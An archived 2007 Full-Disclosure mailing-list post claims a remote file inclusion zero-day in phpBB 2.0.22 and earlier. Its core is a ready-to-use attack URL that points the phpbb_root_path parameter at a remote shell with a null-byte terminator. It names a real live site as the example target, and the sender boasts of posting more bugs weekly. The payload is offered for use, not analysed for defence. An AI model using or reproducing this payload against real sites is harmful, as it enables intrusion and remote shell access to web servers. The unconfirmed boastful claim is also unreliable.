[Full-disclosure] 0DAY RFI in phpBB <= 2.0.22 HOT

dr.rezen at gmail.com dr.rezen at gmail.com
Fri Jun 1 18:05:01 BST 2007

Previous message: [Full-disclosure] n.runs-SA-2007.013 - F-Secure Antivirus LZH parsing BufferOverflow Advisory
Next message: [Full-disclosure] 0DAY RFI in phpBB <= 2.0.22 HOT
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

New bug found in phpBB, most pages vulnerable, theres more bugs, I\'ll post one a week:

victim/phpBB2/includes/functions_post.php?phpbb_root_path=[remote.shell]%00

For example:

http://www.phpbb.de/includes/functions_post.php?phpbb_root_path=[remote.shell]%00

Enjoy :)

BUG BY REZEN! XORCREW! H4X H4X!

Previous message: [Full-disclosure] n.runs-SA-2007.013 - F-Secure Antivirus LZH parsing BufferOverflow Advisory
Next message: [Full-disclosure] 0DAY RFI in phpBB <= 2.0.22 HOT
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Full-Disclosure is hosted and sponsored by Secunia.